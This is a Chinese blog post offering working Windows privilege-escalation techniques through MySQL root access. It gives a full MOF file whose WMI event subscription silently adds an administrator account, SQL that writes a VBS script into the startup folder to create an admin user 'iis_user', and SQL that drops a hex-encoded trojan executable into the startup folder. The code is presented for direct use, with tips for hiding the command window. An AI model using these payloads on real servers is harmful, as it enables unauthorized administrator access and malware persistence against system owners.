【渗透测试】-服务器提权之mysql提权

2017-08-11  本文已影响554人  lndyzwdxhs

0x01:使用mysql给服务器提权,必须先使mysql得到root权限

0x02:使用mysql提权

#pragma namespace("\\\\.\\root\\subscription") 
instance of __EventFilter as $EventFilter 
{ 
    EventNamespace = "Root\\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 
instance of ActiveScriptEventConsumer as $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; 
}; 
instance of __FilterToConsumerBinding 
{ 
    Consumer   = $Consumer; 
    Filter = $EventFilter; 
}; 
保存为:1.mof
然后mysql执行下面
select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

VBS启动项提权 
create table a (cmd text); 
insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 
insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " ); 
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " ); 
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs"; 
先在webshell里连接上数据库,建立表,将VBS写入表里,然后导入启动项,如果UDF提权不行的话也可以尝试下这个方法,前提是要有ROOT权限,后面有个,0表示不弹出CMD窗口,安静的运行。 
还可以这样写: 
create table a (cmd BLOB); 
insert into a values (CONVERT(木马的16进制代码,CHAR)); 
select * from a into dumpfile ’C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe’ 
drop table a; 
执行前3条语句,就可以将木马写进启动里了,前提是木马一定要是16进制,还有就是路径要是\\,因为windows会自动过滤掉一个\

0x03:脚本权限范围

欢迎关注微信公众号(coder0x00)或扫描下方二维码关注,我们将持续搜寻程序员必备基础技能包提供给大家。


上一篇下一篇

猜你喜欢

热点阅读